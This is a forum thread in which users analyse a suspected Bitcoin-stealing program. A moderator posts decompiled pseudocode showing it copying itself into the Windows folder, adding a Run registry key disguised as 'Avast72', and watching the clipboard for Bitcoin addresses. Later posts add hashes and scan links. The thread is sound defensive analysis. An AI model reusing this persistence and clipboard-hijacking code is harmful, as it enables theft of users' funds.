Bitcoin Forum
December 08, 2016, 12:02:23 PM *
News: Latest stable version of Bitcoin Core: 0.13.1  [Torrent].
 
   Home   Help Search Donate Login Register  
Pages: [1]
  Print  
Author Topic: "allseingbiteye" - a virus, or just weird?  (Read 2134 times)
ThePiachu
Sr. Member
****
Offline Offline

Activity: 442



View Profile WWW
January 28, 2012, 03:45:25 AM
 #1

On the Bitcoin SE someone mentioned this site:
http://[wallet stealer].tk/
Question can be found here:
http://bitcoin.stackexchange.com/q/2778/323

Has anyone checked whether this website is distributing some sort of virus?

1HWbVLhxj7bhewhyapMZpyhqWAeAhJd51E
My Bitcoin Calculator:
http://tpbitcalc.appspot.com/
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
grue
Global Moderator
Legendary
*
Offline Offline

Activity: 1932



View Profile
January 28, 2012, 04:10:28 AM
 #2

most likely a virus

decompiled winmain
Code:
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  int v4; // ebx@1
  unsigned int v5; // eax@9
  SIZE_T v6; // edi@10
  HANDLE v7; // esi@10
  const char *v8; // ecx@11
  HANDLE v9; // eax@11
  void *v10; // esi@11
  const CHAR *v11; // eax@11
  int v12; // ecx@14
  int v13; // edi@14
  CHAR v14; // al@15
  HKEY hKey; // [sp+Ch] [bp-17Ch]@30
  char v17; // [sp+13h] [bp-175h]@3
  void *v18; // [sp+14h] [bp-174h]@29
  unsigned int v19; // [sp+28h] [bp-160h]@28
  const char *v20; // [sp+30h] [bp-158h]@9
  int v21; // [sp+40h] [bp-148h]@9
  unsigned int v22; // [sp+44h] [bp-144h]@9
  CHAR ExistingFileName; // [sp+4Ch] [bp-13Ch]@1
  char v24; // [sp+61h] [bp-127h]@2
  char v25; // [sp+68h] [bp-120h]@1
  CHAR String1[52]; // [sp+150h] [bp-38h]@11
  unsigned int v27; // [sp+184h] [bp-4h]@1
  int v28; // [sp+188h] [bp+0h]@1

  v27 = (unsigned int)&v28 ^ __security_cookie;
  v4 = operator new(4u);
  *(_DWORD *)v4 = 33120;
  dword_40D9E4 = v4;
  memcpy(&ExistingFileName, "c:\\windows\\mcfartietrby.exe", 0x1Cu);
  memset(&v25, 0, 0xE8u);
  if ( sub_401040() == *(_DWORD *)v4 + 9 )
    --v24;
  *(_DWORD *)v4 += 9;
  v17 = strcmp(&ExistingFileName, (const char *)"c:\\windows\\mcfartietray.exe") == 0;
  if ( sub_401040() == *(_DWORD *)v4 )
  {
    if ( v17 )
    {
      if ( byte_40D9E8 )
        GetModuleFileNameA(0, &ExistingFileName, 0x104u);
    }
  }
  if ( CopyFileA(&ExistingFileName, (LPCSTR)"c:\\windows\\mcfartietray.exe", 1) )
  {
    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2u, &hKey);
    RegSetValueExA(hKey, "Avast72", 0, 1u, "c:\\windows\\mcfartietray.exe", 0x1Cu);
    ShellExecuteA(0, 0, (LPCSTR)"c:\\windows\\mcfartietray.exe", 0, "c:\\", 0);
    goto LABEL_31;
  }
  CreateMutexA(0, 0, "mcfartietray");
  if ( GetLastError() == 183 )
  {
LABEL_31:
    v0 = 0;
    return 0;
  }
  v5 = GetTickCount();
  srand(v5);
  v22 = 15;
  v21 = 0;
  LOBYTE(v20) = 0;
  if ( v17 )
  {
    while ( 1 )
    {
      do
      {
        do
        {
          Sleep(0x1F4u);
          OpenClipboard(0);
          v7 = GetClipboardData(1u);
          CloseClipboard();
          v6 = GlobalSize(v7);
        }
        while ( v6 - 30 > 9 );
        OpenClipboard(0);
        v9 = GetClipboardData(1u);
        v10 = v9;
        v11 = (const CHAR *)GlobalLock(v9);
        lstrcpyA(String1, v11);
        GlobalUnlock(v10);
        CloseClipboard();
        v8 = v20;
        if ( v22 < 0x10 )
          v8 = (const char *)&v20;
      }
      while ( !strcmp(String1, v8) );
      v13 = v6 - 1;
      v12 = 0;
      if ( v13 <= 0 )
      {
LABEL_26:
        if ( String1[0] == 49 || String1[0] == 51 )
        {
          sub_401430();
          sub_401590();
          if ( v19 >= 0x10 )
            operator delete(v18);
        }
      }
      else
      {
        while ( 1 )
        {
          v14 = String1[v12];
          if ( v14 < 49 || v14 > 57 )
          {
            if ( (v14 < 97 || v14 > 122) && (v14 < 65 || v14 > 90) )
              break;
          }
          if ( v14 == 108 || v14 == 73 || v14 == 79 || v14 == 48 )
            break;
          ++v12;
          if ( v12 >= v13 )
            goto LABEL_26;
        }
      }
    }
  }
  return 0;
}
it adds a program to system startup. pretty suspicious imo.
virus scan https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/
runtime analysis: http://anubis.iseclab.org/?action=result&task_id=17f90702efa19eb14a9df4ac9504bbf98&format=html

It is pitch black. You are likely to be eaten by a grue.

Tired of annoying signature ads? Ad block for signatures
dooglus
Legendary
*
Offline Offline

Activity: 2002



View Profile
January 28, 2012, 07:01:55 AM
 #3

decompiled winmain

That's pretty impressive.  What tool did you use to do that?

sveetsnelda
Hero Member
*****
Offline Offline

Activity: 644


View Profile
January 28, 2012, 07:48:46 AM
 #4

It even makes the run entry look like it's an antivirus scanner (Avast72).  Smiley

Most certainly a virus/malware/spyware.

14u2rp4AqFtN5jkwK944nn741FnfF714m7
CD-RW
Jr. Member
*
Offline Offline

Activity: 57


View Profile
February 14, 2012, 09:12:47 AM
 #5

Sorry for bumping, I found some new information...
A new link got added about a Bitcoin generator on some Tor forum.

"Bitcoin generator.exe" 51.735    bytes.
SHA256: 1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b
Virustotal: https://www.virustotal.com/file/1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b/analysis/

I found this thread due the fact he still uses c:\windows\mcfartietrby.exe
I also found this email in the binary data: seren1ty0wns@gmail.com

Threatexpert for the file: http://www.threatexpert.com/report.aspx?md5=ede9632fc341e0279bb3f8a49b8730f1
MPOE-PR
Hero Member
*****
Offline Offline

Activity: 756



View Profile
April 20, 2012, 12:50:06 AM
 #6

Quote
mcfartietray.exe

...McFartieTray?! Sounds foul either way.

My Credentials  | THE BTC Stock Exchange | I have my very own anthology! | Use bitcointa.lk, it's like this one but better.
Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!